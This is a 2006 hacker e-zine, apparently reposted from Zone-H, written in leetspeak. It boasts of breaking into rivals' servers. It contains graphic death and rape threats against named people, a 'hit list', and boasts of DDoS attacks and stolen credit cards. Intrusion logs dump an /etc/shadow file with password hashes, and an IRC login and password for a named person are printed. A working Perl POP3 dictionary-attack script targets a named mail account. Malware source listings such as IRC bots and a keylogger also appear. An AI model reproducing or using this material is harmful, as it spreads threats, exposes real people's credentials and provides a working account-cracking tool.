信息来源:Zone-H
#!/bin/rm-rf/yourself
###########################################################
## 0wn & rm 0wn & rm 0wn & rm 0wn & rm 0wn & rm ##
## ,-------------------------------------------------. ##
## >-------------------------------------------------< ##
## | -~- !Support!Zone-H!Support!HackThisSite! ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Deface [secfocus|frsirt|milw0rm] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- DDoS [*@efnet *@freenode] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Steal CC #s [and trade to us] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Trade xplz [on #darknet] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- !Support!Morning_Wood!Support!Jeremy! ~-~ | ##
## >-------------------------------------------------< ##
## `-------------------------------------------------' ##
## The hardest zine to rool the scene. ##
###########################################################
##:::::::::::::::::::::::::::::0ur:4sc11:4rt1st:1z:d34d::##
##::::: ###:: ###: #########:::::::::s0:fuck:4sc11:::::::##
##::::: ###:: ### ###::: ####:::::::supp0rt:b4nt0wn::::::##
##::::: ###:: ### ###:: #####: ###::::::: #########::::::##
##::::: ######### ###: ## ###: ########: ###:::: ###:::::##
##::::: ###:: ### ### ##: ###: ###:: ### ###:::: ###:::::##
##::::: ###:: ### #####:: ###: ###:: ### ###:::: ###:::::##
##::::: ###:: ###: #########:: ###:: ###: #########::::::##
##::::::::::::::::HAPPY:EASTER:IRC:LAMERZ::::::::::::::::##
###########################################################
## b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3 ##
###########################################################
## root # ls -al /home/rattle/ ##
## total 32 ##
## drwx--x--x 4 rattle rattle 512 May 28 19:30 . ##
## drwx--x--x 254 root wheel 7168 Jun 15 07:07 .. ##
## -rwx--x--x 1 rattle scream2 771 Mar 13 18:00 .cshrc ##
## -rwx--x--x 1 rattle scream2 1 May 28 19:34 .history##
## drwx--x--x 2 rattle scream2 512 Apr 5 21:59 .irssi ##
## -rwx--x--x 1 rattle scream2 255 Mar 13 18:00 .login ##
## -rwx--x--x 1 rattle scream2 165 Mar 13 18:00 .login_c##
## -rwx--x--x 1 rattle scream2 371 Mar 13 18:00 .mail_al##
## -rwx--x--x 1 rattle scream2 331 Mar 13 18:00 .mailrc ##
## -rwx--x--x 1 rattle scream2 801 Mar 13 18:00 .profile##
## -rwx--x--x 1 rattle scream2 276 Mar 13 18:00 .rhosts ##
## -rwx--x--x 1 rattle scream2 852 Mar 13 18:00 .shrc ##
## drwxr-xr-x 2 rattle rattle 512 May 28 19:30 www/ ##
###########################################################
## echo 'h0no rux' > .sig ##
##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-##
## do yourself a favor and support h0no ##
##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-##
## scp ~/.sig
root@undef.net:/root/ ##
###########################################################
## Z0N3-H!H4CKTH1SS1T3!4ND!H0NO!W1LL!D3STR0Y!Y0UR!B0X3Z! ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## 4R3!Y0U!R34DY!2!B3!H4Q3D???4R3!Y0U!R34DY!2!B3!H4Q3D?? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## Z0N3-H!H4CKTH1SS1T3!4ND!H0NO!W1LL!D3STR0Y!Y0UR!B0X3Z! ##
###########################################################
## w4s th1nk1ng m4yb3 w3 sh0uld h4v3 4 d1ff3r3nt f0rm4t, ##
## m4yb3 m0r3 r3c1p3s 4nd h0w-t0s 1nst34d 0f unr3l4t3d ##
## 4rt1cl3s thr0wn t0g3th3r? ##
###########################################################
## 2006-~-2006-~-2006-~-2006-~-2006-~-2006-~-2006-~-2006 ##
###########################################################
## d0nt fuqn f0rg3t GSO! th3 f0rum w1th th3 m0zt h4ck3rz ##
## h4ck3rz th4t h4q! fuq 1r4n up! d3f4c3 4ll 0f th3m! ##
###########################################################
## MSG 10/23/04 at 02:32:56 PM AgntOrng (agntorng@hilary ##
## .duffs.bedroom)
www.gmail.com l:radium.shells ##
## p:sha0lin ##
###########################################################
## H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R. ##
## agntorng 1z 0wn3d, 4ll 0f d4rp4 1n ru1nz, n0 0n3 ##
## th3r3 c4n h4q, x0rt suckz, 1z1k suckz, bl4cks3cur1ty ##
## b3tt3r w4tch th31r b4ckz, fuq 4ll y0u fuck1ng h4ck3rz ##
## wh0 d0nt tr4d3 w4r3z w1th uz. w3 g0t DDoZ 4 fr33 ##
###########################################################
## w3 fuq b0x3z up!!w3 fuq b0x3z up!!w3 fuq b0x3z up!! ##
## h0no3!!!-~-h0no3!!!-~-h0no3!!!-~-h0no3!!!-~-h0no3!!! ##
###########################################################
1TZ 2006, Y34R 0F TH3 H0NO H1TL1ZT
~-~-~-~-~-~-~
H0NO H1T L1ST [y0u d0 _n0t_ w4nt t0 b3 0n th1s!]
-~-~- -~-~-~-~-~-~
0wn3d h4ndl3
-~-~- -~-~-~-~-~-~
[x] di0ad
[x] dvdman
[x] tal0n/skew/bandit/luck0elduck
[x] bx
[x] morning_wood
[ ] camel
[ ] agntorng
[ ] anyone from fuqn darpanet/iua who associates with above 2
-~-~-~-~-~-~-~-~-~
p30pl3 0n th1z l1zt n33d 2 f34r.
th3z3 h1t l1zt b1tch3z c4nt h1d3 f0r3v3r. y0u b3tt3r fuck1ng
ch4ng3 y0ur n4m3z 4nd m0v3 t0 4fr1c4.. c4us3 _W3_ _W1LL_
_FUCK_ _Y0UR_ _B0XEZ_ _UP_!_!_!_
~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
now why would you want to be on thiz list?? you do not want to
be! h0no will fucking tear your life to fucking shreadz. w3 h4v3
3 truckl04dz 0f 0d4yz w1th a b0tn3t th3 s1z3 0f a 1st w0rld
c0untry. w3 h4v3 m1ll10nz 0f CC #'z. w3 w1ll p4y 0ff assassi4nz.
w3 h4v3 m0b c0nn3ct10nz t1ght3r th4n p3ng0. y0u w4nt t0 fuq1ng
d13? y0u w4nt y0ur l1f3 t0 3nd b3c4uz3 0f y0ur d0rky 0nl1n3 1rc
ch4tz? st3p th3 fuck up. m3nt10n h0no, y0u w1ll b3 0wn3d. th1nk
4b0ut d1zz1ng us 4nd y0u w1ll b3 k1ll3d. thr04t sl1t! try t0
1d3nt1fy us 4nd I w1ll F1ND Y0UR F4M1LY 4ND K1LL 3V3RY L4ST 0N3
0F TH3M!@# R4P3 & MURD3R Y0UR M0TH3R. BL00D, PUZZ, & CUM 0ZZ1NG
0UT 0F H3R FUCK1NG CUNT. D0 N0T! D0 N0T! D0 N0T FUCK W1TH H0NO!
~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
1F 4NY0N3 0F Y0U TH1NK 1TZ 0V3R.. 1T 1Z N0T. Y0UR L1F3Z 4R3
F1N1SH3D! Y0U H4V3 FUCK3D W1TH WR0NG GR0UP 0F CR1M1N4LZ. FUCK1NG
D34D. W3 W4NT Y0U 0FF TH3 1NT3RN3T, W3 W4NT Y0U 0FF TH3 PL4N3T.
W3 _W1LL_ F1ND Y0UR 1NF0, W3 _W1LL_ FUCK1NG CRIPPL3 Y0U. 1T 1Z 4
PR0M1Z3.
~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
[ARGH!@# I AM S0 M4D I BROK3 MY K3YB0ARD 0V3R MY H34D.]
-1.txt Intr0dukti0n
00.txt -~-~-~ s0rry silent, y0ur 0wn3d
01.txt -~-~-~ konewka roSUCKZ
02.txt -~-~-~ ri0t c0d3z
03.txt -~-~-~ sabre-security
04.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 1 (esser)
05.txt -~-~-~ tal0n g3tz h4x up!
06.txt -~-~-~ k33p1ng 0d4y s4f3 (th3 v3rs10n phC n3v3r w4nt3d y0u t0 s33!!)
07.txt -~-~-~ g0tfuq3d, g0t0wn3d, g0tn00d4yz4h0not0st34l...
08.txt -~-~-~ N3V3R 0WN3D!! rave. N3V3R 0WN3D!!
09.txt -~-~-~
3th1cz@exploits.cx
10.txt -~-~-~
ethics@idefense.com
11.txt -~-~-~ 0day iCER r4pz
12.txt -~-~-~ core-sdi b1t3z th31r t0ngu3.
13.txt -~-~-~ 1f b4b0 c4nt h4q th3m..
14.txt -~-~-~ majestic 4x3d.
15.txt -~-~-~ a pr0p0s4l 4 3b4y3rz
16.txt -~-~-~ kf g03z br0k3
17.txt -~-~-~ d4rp4n3t/d1s.0rg fuqt4rd s31z3d
18.txt -~-~-~ h3llm4n c4nt 4dm1n
19.txt -~-~-~ ptp un3th1c4l h4ck1ng
20.txt -~-~-~ how hack in pc
21.txt -~-~-~ di0ad 1z t04zt3d
22.txt -~-~-~ 0wlm4n4tt r3s1gnz
23.txt -~-~-~ nc/rx 0wn3d t0 fuq
24.txt -~-~-~ th3 f41l3d corestorm t34m.
25.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 2 (kunz)
26.txt -~-~-~ 4ud1t1ng th3 h4q3rz m1nd
27.txt -~-~-~ DVDMAN 1Z A FUQN FR34K!!@#
28.txt 0utr0
-1.txt -~-~-~ Intr0dukti0n
h0ly fuck1ng sh1t d1vin31nt! We g0t s0m3 w4r3z. 1tz t1m3 t0
us3 th3m. w3 s3r10uzly c0nc1d3r3d qu1t1ng h4ck1ng, but w1th0ut
us wh0 w0uld rm y0u? wh0 w0uld DoS y0u? wh0 w0uld tr4d3 y0ur
CC #s? Th1ngz 1n d4rkn3t h4v3 cr4wl3d t0 4 gr1nd1ng h4lt. n0
0n3 1s sh4r1ng th31r w4r3z 4nym0r3, s0 w3 h4d t0 m0v3 t0
4lt3rn4t1v3 m34nz t0 g3t th3 0d4y. th4nk g0d f0r b4nt0wn.
w3'v3 h1t th3 j4ckp0t 4nd us3d 4ll 0f 0ur p4yp4l and CC #s t0
purch4s3 s0m3 gr4d3-A w4r3z fr0m A z0ne-h fr13nd 4nd w3 3v3n h4d
th3 w1nn1ng b1d f0r 4n 3xc3l 0d4y unt1l 3b4y turn3d 1nt0 puss1ez.
gu3zz w3 w1ll h4v3 t0 fuzz s0m3m0r3 t0 m4k3th3 y34rly qu0t4.
~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
0n 4 t0t4lly d1ff3r3nt subj3ct, tw0 m0r0nz wh0 c4nt c0de
(agntorng & camel - rm 0n s1ght), y3t t4lk m0r3 sh1t th4n 1f
n3td3v & 4ll m3mb3rz 0f b4b0 c0mb1n3d 1nt0 0n3 sup3r
f3c3z-b4b3l-spr4y1ng m4ch1n3, 4r3 runn1ng 4r0und l1k3 s0m3
un3mpl0y3d w1r3d.c0m 3d1t0rz st4rt1ng sh1t 4ll 0v3r th3 pl4c3.
th3y kn0w w3 g0t th31r 1nf0z, th3y kn0w w3 g0t th3 w4r3z,
th3y kn0w th3y 4r3 d3f3ns3l3zz. th3n why w0uld 4ny0n3 w4nt t0
st3p up t0 us??
fuck w1th h0no 4nd y0u w1ll g3t d3lt w1th.
1t 1s pr0b4bly b3tt3r f0r y0ur b0x 1f y0u d0nt 3v3n r34d th1s z1n3.
00.txt -~-~-~ s0rry silent, y0ur 0wn3d
ircd@box187 ~ $ cat sn1ffl0g | grep \|silent
:d4rkgr3y!~phear@217.107.223.43 PRIVMSG FoxTrot- : |silent is m00 member
y0u truzt y0ur m3mb3rz d4rkgr3y? l3tz s33..
--------------------------------------------------------------------------------
18:53 <|silent> btw! there is a group outta there who own boxes from
security-team-ppl
18:53 <|silent> 2 m00 ppl already got owned and one teso guy got owned
18:53 <|silent> i know all the 3 ppl!
18:54 <|silent> i'm a bit scared they seem to be good i just hope they wont take
my server :/
18:54 <|silent> check
http://h0h0.com/h0no.txt
18:54 <|silent> search for silent in the document
18:55 <cellular> heh, nice :P
18:55 <cellular> they wont manage it :P
18:55 <cellular> ill read it, i just fix the mail stuff first
18:57 <|silent> okay :)
19:00 <cellular> seems to work ;)
19:00 <|silent> :D
19:01 <cellular> hmmm
19:01 <cellular> which box is that ?
19:01 <cellular> drwx------ 2 rob rob 512 Sep 19 19:06 rob
19:01 <cellular> drwx------ 2 silent silent 512 Sep 20 06:16 silent
19:02 <|silent> it was the box from a m00 teammate
19:02 <cellular> ok :P
19:02 <|silent> from a fucking good security guy also! so i'm a bit scared ;/
19:03 <|silent>
http://reflux.dyndns.org/
19:03 <cellular> lol, they write like fucking script-kiddies :P
19:03 <cellular> ok
19:03 <|silent> lol
19:03 <cellular> if they manage to get your root password it is no problem to
root it
19:03 <cellular> else it's HARD
19:03 <cellular> i don't think they will manage to do so
19:04 <cellular> since you use random return addresses
19:04 <cellular> most exploits require a pre-defined return address to occour to
work
19:04 <|silent> yea but.. they don't use bruteforce shit.. as the hono file
say ;/
19:04 <cellular> atleast overflow exploits
19:04 <|silent> they use useraccounts and gain root with it
20:20 <silentoo> but remember i'll add m00 and priv8 ppl
20:20 <cellular> then we'll degrade
20:20 <cellular> grrr
20:20 <cellular> fuck :P
20:20 <silentoo> hahaha :D
20:20 <silentoo> i add all the coder :D
20:20 <cellular> hahaha :P
20:20 <silentoo> so we can take their sources and advisories :D
20:20 <cellular> you've talked to them ?
20:20 <silentoo> yep
20:20 <cellular> yep :P
20:21 <silentoo> i announced in m00 members page that i'll got a server for the
coders :)
20:21 <cellular> then we root fbi.gov
20:21 <silentoo> hahaha
20:21 <silentoo> not from my server :D
20:21 <cellular> i will :P
20:21 <silentoo> but we have to think about something which copy all new
downloaded files to a special folder ;D
20:22 <silentoo> so that we can get it later :p
20:22 <silentoo> and we have to manipulate w and who so that ppl just see their
own processes
20:22 <silentoo> ehrm
20:22 <silentoo> own connections
--------------------------------------------------------------------------------
-~-~-~QOUTE-~-~-~ "so i'm a bit scared" - |silent -~-~-~QOUTE-~-~-~
digitaljunk:~$ uname -a; id
Linux digitaljunk 2.6.11.9-grsec-digitaljunk #2 Tue May 31 19:42:12 CEST 2005 i686 GNU/Linux
uid=1000(silent) gid=100(users) Gruppen=100(users)
digitaljunk:~$ cd Maildir/new/
digitaljunk:~/Maildir/new$ cat 1117650803.V302I40e229M467122.localhost.localdomain
Return-Path: <
mailinglists@frsirt.com>
X-Original-To:
silent@oral-sex.bz
Delivered-To:
silent@oral-sex.bz
Received: from ns30617.ovh.net (ns30617.ovh.net [213.186.47.153])
by mail.digitaljunk.de (Postfix) with SMTP id 508F11AF2EE
for <
silent@oral-sex.bz>; Wed, 1 Jun 2005 20:33:23 +0200 (CEST)
Received: (qmail 24578 invoked by uid 99); 31 May 2005 09:32:46 -0000
Date: 31 May 2005 09:32:46 -0000
Message-ID: <
20050531093246.7663.qmail@ns30617.ovh.net>
To:
silent@oral-sex.bz
Subject: [Exploits] Microsoft Windows Exploit (MS05-012), Zeroboard 4.x "preg_replace" Exploit
From: FrSIRT Alerts <
mailinglists@frsirt.com>
X-Sender: <
mailinglists@frsirt.com>
Mime-Version: 1.0
charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
----------------------------------------------------------------------
FrSIRT / Exploits and Codes
----------------------------------------------------------------------
The French Security Incident Response Team 24/24 & 7/7
----------------------------------------------------------------------
- 31 May 2005 -
----------------------------------------------------------------------
- Microsoft Windows COM Structured Storage Local Exploit (MS05-012)
http://www.frsirt.com/exploits/20050531.SSExploit.c.php
- Zeroboard 4.x "preg_replace" Remote Command Execution Exploit
http://www.frsirt.com/exploits/20050531.zeroboard.c.php
----------------------------------------------------------------------
Copyright © 2002-2005 - FrSIRT.COM
----------------------------------------------------------------------
#################################################################
## y0u w1ll n33d m0re th4n 0ld w4r3z t0 b3 s4f3! ##
#################################################################
digitaljunk:~/Maildir/new$ cd
digitaljunk:~$ cd coding/
digitaljunk:~/coding$ ls *
cokebot:
bf_tab.h blowfish.c blowfish.h cocain cokebot.c Makefile
dev-files:
blowfish-dev mysql-dev
done:
kaiten.c keyloger.c libirc.tar.gz uingen.c
php:
bleattern.php getfiletime.php nospam.php random_pass.php upload.php
urlvalid.php validate_mail.php
samples:
fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c
digitaljunk:~/coding$ head -n54 cokebot/cokebot.c
/*
****** PRIVATE EDITION ******
* *
* cokebot v.0.5 beta *
* © 2004 by |silent *
* *
*****************************
Changelog: 08.11.2004
+ added reconnect feature!
Changelog: 03.11.2004
+ added part command
+ added restart command (beta! too lazy to fork() ;D will do it soon!)
Changelog: 02.11.2004
+ added static login (eh? missing part cmd see TODO)
+ added chanlist (beta! chan/chankey support done!)
+ added userlist support
+ replaced join/op/deop/die/whoami commands for user-support
+ added userlist with authlevel
+ added support for older gcc
Changelog: 01.11.2004
+ rewrote command system
+ radnom nick/user/ident
+ updated conn()
+ added nick system (completation etc..)
+ blowfish cryption (beta)
+ segfault on quit fixed
+ fixed segfault on non-existing sites.conf
Changelog: 31.10.2004
+ radnom nick/user/ident
+ replaced sendtotarget()
+ static server/port
+ added commandlist by char
TODO:
- use linked lists for chans
- restart fork()
- better blowfish implementation
- doconf() to create conf-files if non exist
- crypted userlist
- crypted chanlist
- add modes etc.. to chanlist
- sitemanager
- admin control to modify chans/user
- useradd
- evilmode
- hidden process
- shellcommands
*/
digitaljunk:~/coding$ head -n5 done/keyloger.c
/*
Simple Keyloger - by |silent
*/
digitaljunk:~/coding$ head -n22 done/uingen.c
#include <stdio.h>
#include <stdlib.h>
void welcome() {
printf("[-] UINGen by |silent\n");
printf("[-] (c) 2004 |silent\n");
printf("[-] Contact:
silent@oral-sex.bz\n");
printf("[-] Website:
http://blackhat.tv\n");
}
void usage() {
printf("[-] Usage: ./uingen -f <first-uin> -l <last-uin> [-po]\n");
printf("[-] Scan-Example: ./uingen -f 500000 -l 550000 -p test123 -o uinlist.txt\n");
printf("[-] Single-UIN Example: ./uingen -s 123123123 -w word.lst -o brutelist.txt\n");
printf("[-] -f First UIN\n");
printf("[-] -l Last UIN\n");
printf("[-] -s Single UIN/Wordlist Mode [-w required]\n");
printf("[-] -w Wordlist [for single UIN mode only]\n");
printf("[-] -p Password [default: password]\n");
printf("[-] -o Outfile [default: outfile.txt]\n");
exit(1);
}
digitaljunk:~/coding$ ls samples/
fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c
#################################################################
## ~-~Wh3r3 4r3 th0s3 c0d3z......?? ##
#################################################################
digitaljunk:~$ cd htdocs/
digitaljunk:~/htdocs$ ls
213.239.211.98 digitaljunk.de greyhat.co.uk oral-sex.bz
digitaljunk:~/htdocs$ ls digitaljunk.de/content/vidz
afterhour-part1.avi
silent_owned.wmv
digitaljunk:~/htdocs$ ls digitaljunk.de/content/coding/exploits/
#################################################################
## ~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~ ##
#################################################################
digitaljunk:~/htdocs$ ls digitaljunk.de/content/coding/sources/
agobot3-0.2.1-pre4-priv.rar
blow
BlowSXT.rar
connectback.pl
hookbot.tgz
kaiten.c
libirc.tar.gz
mysql
pftp-src.0.11.4.tgz
shijack.c
sock.c
uingen.c
digitaljunk:~/htdocs$ cd
digitaljunk:~$ ./h00p1tup
digitaljunk:/home/silent# id
uid=0(root) gid=0(root) Gruppen=0(root)
digitaljunk:/home/silent# cd
digitaljunk:~# ls
allsql.sql
candicrew_home.tgz
cyrus-imapd-2.2.12.tar.gz
db-4.3.28
ebba_home.tgz
oidentd-2.0.7
pam_mysql-0.5.tar.gz
procmail-3.22
video.asp?video=V8-Chainsaw
awstats-6.5.tar.gz
cybersoft_inkasso_home.tgz
cyrus-sasl-2.1.21
db-4.3.28.tar.gz
install-report.template
oidentd-2.0.7.tar.gz
postfix-2.1.6
procmail-3.22.tar.gz
waterguide_home.tgz
awstats-6.5.tar.gz.1
cyrus-imapd-2.2.12
cyrus-sasl-2.1.21.tar.gz
dbootstrap_settings
Mail
pam_mysql
postfix-2.1.6.tar.gz
vhosts.conf.backup
webmin-1.200.tar.gz
digitaljunk:~# cat /etc/shadow
root:$1$T6gE9w0/$vo/dIs7jK7CP2lr.aRtMx/:12934:0:99999:7:::
daemon:*:12893:0:99999:7:::
bin:*:12893:0:99999:7:::
sys:*:12893:0:99999:7:::
sync:*:12893:0:99999:7:::
games:*:12893:0:99999:7:::
man:*:12893:0:99999:7:::
lp:*:12893:0:99999:7:::
mail:*:12893:0:99999:7:::
news:*:12893:0:99999:7:::
uucp:*:12893:0:99999:7:::
proxy:*:12893:0:99999:7:::
www-data:*:12893:0:99999:7:::
backup:*:12893:0:99999:7:::
list:*:12893:0:99999:7:::
irc:*:12893:0:99999:7:::
gnats:*:12893:0:99999:7:::
nobody:*:12893:0:99999:7:::
Debian-exim:!:12893:0:99999:7:::
sshd:!:12893:0:99999:7:::
mysql:!:12893:0:99999:7:::
silent:$1$72YyIyox$67vyj7jfLUWeFYA24dWOl1:12934:0:99999:7:::
breath:!:12934:0:99999:7:::
upload:$1$gVq9vOrJ$qrQgeXNVHjX.FFi4xhK9K/:12934:0:99999:7:::
hillside:$1$gfXquKfq$mWkMvMvKY3sck.PJstZqp0:12934:0:99999:7:::
bind:!:12934:0:99999:7:::
tuborg:$1$lhO4VKnt$yx9/34El7HK5m5KS5jUFe/:12934:0:99999:7:::
cyrus:$1$mk7JsS6t$/lGzf9WhyOT9ZdotH.ajN.:12934:0:99999:7:::
postfix:!:12934:0:99999:7:::
dovecot:!:12935:0:99999:7:::
tech:$1$SYf8xzC/$enjJt2k9hqxdxiUogdD3D/:12935:0:99999:7:::
marius:$1$mtWc/oSj$czow9rYQcy3EPrtRfTQHX0:12935:0:99999:7:::
jonas:$1$i9wTlJ7r$4TbucpQL.uG6RmDgkq9uP.:12936:0:99999:7:::
bjerkis:$1$Z8TcITtK$KvOghtp2AYJCQLogkHovh1:12936:0:99999:7:::
#################################################################
# QOUTE ~-~ "18:55 <cellular> they wont manage it :P" ~-~ QOUTE #
#################################################################
Th4nkz t0 |s1l3nt f0r st34l1ng pr1v4t3 c0d3z fr0m h1z t34m-m4t3z
(m00 & priv8sec) & f0r l3tt1ng us t4k3 1t s0o0o e4s1ly! w4tch f0r
silent_owned2.wmv t0 dr0p.
Whois silent?
08:34 -!- |silent [
silent@divinity-38478E7B.de]
08:34 -!- ircname : h0no I've been owned!
08:34 -!- channels : @#darpa @#m00 @#teengaysex
08:34 -!- server : irc.blackhat.ru [m00 IRCd]
08:34 -!- : is a Secure Connection
08:34 -!- idle : 0 days 2 hours 15 mins 34 secs
08:34 -!- End of WHOIS
01.txt -~-~-~ konewka roSUCKZ
konewka fr0m roSEC g3tz 4x3d, m4yb3 h3 sh0uld sp3nd m0r3 t1m3 th1nk1ng up a
b3tt3r p4zzw0rd r4th3r th4n tr4d1ng cr3d1t c4rdz 4nd sh1tty s0urc3. 1t 0nly
t00k hydr4 a 200kb d1c t0 cr4q h1z p4zz. h1z c0d3z 4r3 m0r3 p01ntl3zz th4n
a hwa-security r3l34z3.
login as: konewka
konewka@83.23.44.188's password:
Last login: Wed Sep 20 23:10:59 2005 from h.0.n.o
+ Welcome aboard +
konewka@olek:~$ uname -a;id
Linux olek 2.4.30-ow3 #1 Tue Sep 13 18:45:51 CEST 2005 i686 unknown
uid=1000(konewka) gid=100(users) groups=100(users),10(wheel)
konewka@olek:~$ ls -al
total 3772
drwx-----x 14 konewka users 4096 Sep 17 18:03 .
drwxr-xr-x 5 konewka users 4096 May 24 15:28 ..
-rw------- 1 konewka users 6173 Sep 20 16:20 .bash_history
drwx------ 3 konewka users 4096 Sep 4 12:34 .gg/
drwx------ 3 konewka users 4096 Oct 29 2004 .irssi/
drwxr-xr-x 3 konewka users 4096 Sep 14 14:39 .mc/
drwx------ 2 konewka users 4096 Aug 22 15:59 .screen/
-rw-r--r-- 1 konewka users 3394 May 5 2004 .screenrc
drwx------ 2 konewka users 4096 May 30 2004 .ssh
drwx------ 4 konewka users 4096 Apr 10 15:07 b0x/
-rw-r--r-- 1 konewka users 205 Aug 13 22:10 clear_dict.pl
-rwxr-xr-x 1 konewka users 12224 Aug 8 22:13 mcrack
drwxr-xr-x 10 konewka users 4096 Mar 16 2005 meggdrop
drwxr-xr-x 2 konewka users 4096 Aug 9 22:28 mgg_hijack
drwxr-xr-x 2 konewka users 4096 May 23 2004 mlamebot
-rwxr-xr-x 1 konewka users 621 Aug 13 01:54 mmcrack.pl
drwxr-xr-x 2 konewka users 4096 Aug 10 2004 n0f
-rw-r--r-- 1 konewka users 571856 Aug 12 19:35 mperl5.zip
-rw-r--r-- 1 konewka users 2154218 Aug 13 01:56 polish
-rw-r--r-- 1 konewka users 1022183 Aug 13 22:09 polish.clear
-rwxr-xr-x 1 konewka users 1498 Jan 8 2005 relay.pl
drwxr-xr-x 2 konewka users 4096 Aug 11 20:02 smb_h03
-rw-r--r-- 1 konewka users 21 Jul 22 22:07 temporary
drwxr-xr-x 2 konewka users 4096 Aug 3 21:57 w0rkz
konewka@olek:~$ head -n4 relay.pl
#!/usr/bin/perl -w
# relay.pl C-class smtp relay scanner by konewka <
konewka@localdomain.ru>
# use ./relay.pl 2> relay_servers to log only smtps with relaying.
# This is edu purpose only. enjoy
konewka@olek:~$ cat mcrack.pl
#!/usr/bin/perl -w
use Net::POP3;
# setup
my $host = "poczta.onet.pl";
my $user = "malgosia181";
my $dict = "polish";
print "mrack.pl by konewka\n";
open(WORDLIST, $dict);
$pass = <WORDLIST>;
$| = 1;
while ($pass ne "") {
$pop3 = Net::POP3->new($host); die "Can't connect !" unless $pop3;
$pass = substr($pass, 0, length($pass)-1);
$cracked = $pop3->login($user, $pass);
if (defined($cracked)) {
print "\nCracked ! Password = ".$pass."\n";
$pop3->quit();
close(WORDLIST);
exit 1337;
}
else {
print ".";
}
$pass = <WORDLIST>;
}
printf "I guess nothing was cracked this time.\n";
konewka@olek:~$ cd .ssh
konewka@olek:~/.ssh$ cat known_hosts
192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtZ8HOFBxujq/T3Mnnv2uGAdSdu6eERdVMiUlwJzmwuyzPgAn/taXzPfMgCLM9QfEBzuc1K20+h1jn0MPPGavQfmuBcShz+zPSUA3IAbqjyUvHtO+J3ODDweDl2wy3qGefrBAhlTSQTphjb/cKRO3PLztHd2qM14xB1svC8WU81c=
rosec.segfaulted.com,80.97.66.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0hwGICbJvrIfgezT5j4RtAF1cW0sWmRxr5Ym21pHg4Bn7ujHXdogSQJenI6GeJ4q2FI4mfVVui+Ce7VKKZs3YYeR/lIvbJh5p6cjjmw2oJyIMjp3dsRd3QZnM1IrDt9tZCVyHWALwT2GyH7sFwS5YiqQczBvPUcssEx1+//z3r0=
ffs.ath.cx,82.224.195.151 ssh-dss AAAAB3NzaC1kc3MAAAEBAKj6I/LFVpofk3d9f65Cr/CjViVBA64+aaIfSk2h0Shz09TT4SdSLpDh6uMh2UX+SX/4pMq3ke2tmUzY7NYt6ZhOge7sOgsIF0S/bRFyGO25Ow58AWPDTk4Z/B93wSc31gE+oiLi9fIrt0JJwTEbswQgmMjnGjiV9QB0OB1XbevgfTBtsxc+DtbuXAWsA9/JWthIXf3UlgHj20hRpTgp4q6r00bD0efmSbyqWq0U+rTKHS8dFAnLiRrvfkLzkToDjdffr/MFj9gJI+Z04Aki25KzgFW4i2imep5foq08/9zanOQ/OMSfW6tdEXGBLUXJQhEOUUUGHvXuPaTnGHOktbsAAAAVAKLGZ4KLasiL6g8XJ0msw56RckzZAAABAEBsfr3TR7l1Ld7PWc7+o/02rE+INHk/hTomKc6tizNo0bF7W1IvjnmX6q17Tj8M1rV6/I1QpYMcfCNC7UZhoMmq//8lum02v+k1LXNjbV+R85V9hYkPYfqzEHpER4hwo/aqelzV9/gVLRxYurRdKg2DqOHEwV/BlKpk/hL0NYsA3RHPdomsQmqBtAYiPeDGUkI3l7lTLO+Vnvhp00Re4KcNzrYsWp3aCF+JcqJ5w8VPJEgoWQI76p7PW5Croaaiebh3d7Mn92wCSaaL0+W3JxY0ZFijJPSFEQQYjrLfASC+a3yi/em8MeAaBc4OrC+Lod7SQHz2AfsdRwAtEYwIfPcAAAEBAIJVSztDyUD8BHUfSfN1yV1vVDcMYY98wpDmluDRO1PEGnGB81y/HJKATKU8VXd7xxJFlhQL92HVohu5Fcz3WiPtZGNw2bcZJ0+s+1ormLgmgcBeWIIG79anXi+JBUugjaf1fzviRmcwChRLU6ameKFWDv4GNW3u4XQEQheN4XbLKhIFT774cFtadTFB4qRTxyh/qOyw6eeW6RzjCaHydVgTY8PzffU13yyoKwsb8MZz9W3G3cicsbZCUKcSPs5OZ8Z9kp4uz4lwAWcoaz8zVlAjxLy62PObmb40qSaLfHUKvvxNs5EQEqirr/wtxpdpPDaiYDaggYECgwYJ6k/11/k=
konewka@olek:~/.ssh$ cd ..
konewka@olek:~$ cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucppublic:
nobody:x:99:99:nobody:/:
